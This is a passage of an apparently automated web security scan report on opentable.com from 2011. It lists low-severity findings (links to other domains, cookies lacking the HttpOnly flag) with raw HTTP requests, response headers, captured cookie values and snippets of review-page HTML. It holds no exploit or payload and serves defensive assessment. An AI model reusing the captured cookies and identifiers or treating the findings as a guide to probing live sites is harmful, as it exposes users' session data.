<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/3/ratingSlider.gif" alt="Energetic" title="Energetic" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D23761271&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/>
</a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/rating.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/3/ratingSlider.gif" alt="Moderate" title="Moderate" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D23727521&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/>
</a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/rating.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/ratingSecondary.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/ratingSecondary.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/ratingSecondary.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/3/ratingSlider.gif" alt="Energetic" title="Energetic" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D23678407&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/>
</a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/rating.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://opentable.ugc.bazaarvoice.com/static/0938/noAvatar.gif" alt="Customer Avatar" title="Customer Avatar"/></span>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/ratingSecondary.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/5/ratingSecondary.gif" alt="2 / 5" title="2 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/5/ratingSecondary.gif" alt="2 / 5" title="2 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/3/ratingSlider.gif" alt="Moderate" title="Moderate" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D23594671&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/>
</a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/5/rating.gif" alt="2 / 5" title="2 / 5"/>
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://opentable.ugc.bazaarvoice.com/static/0938/noAvatar.gif" alt="Customer Avatar" title="Customer Avatar"/></span>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/5/ratingSecondary.gif" alt="2 / 5" title="2 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/ratingSecondary.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/3/ratingSlider.gif" alt="Moderate" title="Moderate" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D23586891&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/>
</a>
...[SNIP]...
<div class="BVDI_FBImage"><img src="http://opentable.ugc.bazaarvoice.com/static/0938/filteringBusy.gif" alt="Filtering is in progress. Please wait until it completes." title="Filtering is in progress. Please wait until it completes."/></div>
...[SNIP]...
<div id="" class="BVRRTrackerImage "><img src="http://opentable.ugc.bazaarvoice.com/static/0938/r_5_ispacer.gif" alt=""/></div>
...[SNIP]...
<dt id="RestaurantProfile_RestProfileGroupDiningTab_SlideShowControl_RestaurantProfileToolbar_toolbarMap" class="mapIcon">
               <a id="RestaurantProfile_RestProfileGroupDiningTab_SlideShowControl_RestaurantProfileToolbar_linkMapLink" class="mapIconLink" rel="nofollow" href="http://maps.google.com/?hl=en&amp;ie=UTF-8&amp;oe=UTF-8&amp;q=401+Taylor+St.,San+Francisco,CA,94102" target="_blank"></a>
           </dt>
           <dd id="RestaurantProfile_RestProfileGroupDiningTab_SlideShowControl_RestaurantProfileToolbar_toolbarMapLink" class="map">    
               <a id="RestaurantProfile_RestProfileGroupDiningTab_SlideShowControl_RestaurantProfileToolbar_linkMapLinkText" class="ToolbarLinkText" rel="nofollow" href="http://maps.google.com/?hl=en&amp;ie=UTF-8&amp;oe=UTF-8&amp;q=401+Taylor+St.,San+Francisco,CA,94102" target="_blank">Map</a>
...[SNIP]...
<div class="ViewSampleMenuWrapper">
               <a id="RestaurantProfile_RestProfileGroupDiningTab_linkViewSampleMenu" class="ViewSampleMenu" href="http://www.serranohotel.com/pdf/jaspers_menu_banquets.pdf" target="_blank">View Sample Menu &rsaquo;</a>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://o.opentable.com/b/ss/otrestref/1/H.22.1--NS/0" height="1" width="1" border="0" alt="" />
...[SNIP]...

6.4. http://www.opentable.com/opentables.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:50 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46252


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://o.opentable.com/b/ss/otrestref/1/H.22.1--NS/0" height="1" width="1" border="0" alt="" />
...[SNIP]...

7. Cookie without HttpOnly flag set  previous  next
There are 5 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



7.1. http://www.opentable.com/frontdoor/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /frontdoor/default.aspx?rid=90&restref=90&bgcolor=e3d4a4&titlecolor=000000&subtitlecolor=000000&btnbgimage=http://www.opentable.com/frontdoor/img/ot_btn_black.png&otlink=FFFFFF&icon=dark&mode=short HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 03 Oct 2011 12:53:35 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:53:35 GMT; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; domain=.opentable.com; path=/
Vary: Accept-Encoding
Content-Length: 64483

document.write("<link href=\"http://www.opentable.com/frontdoor/css/ot_short.css?v=Web_11_10_0_11.prod.com\" rel=\"styleSheet\" type=\"text/css\" /><!--[if IE]><link type=\"text/css\" href=\"http://ww
...[SNIP]...

7.2. http://www.opentable.com/interim.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:44 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=0&hr=http://www.grandcafe-sf.com/&tp=136; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Vary: Accept-Encoding
Content-Length: 5566


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head><meta http-equiv="content-type" content="text/html; chars
...[SNIP]...

7.3. http://www.opentable.com/jaspers-corner-tap-and-kitchen  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jaspers-corner-tap-and-kitchen

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jaspers-corner-tap-and-kitchen?rid=200&restref=200 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:50 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&vbefres=1&vbefreg=1&js=0&m=4&restref=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&vbefres=1&vbefreg=1&js=0&m=4&restref=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
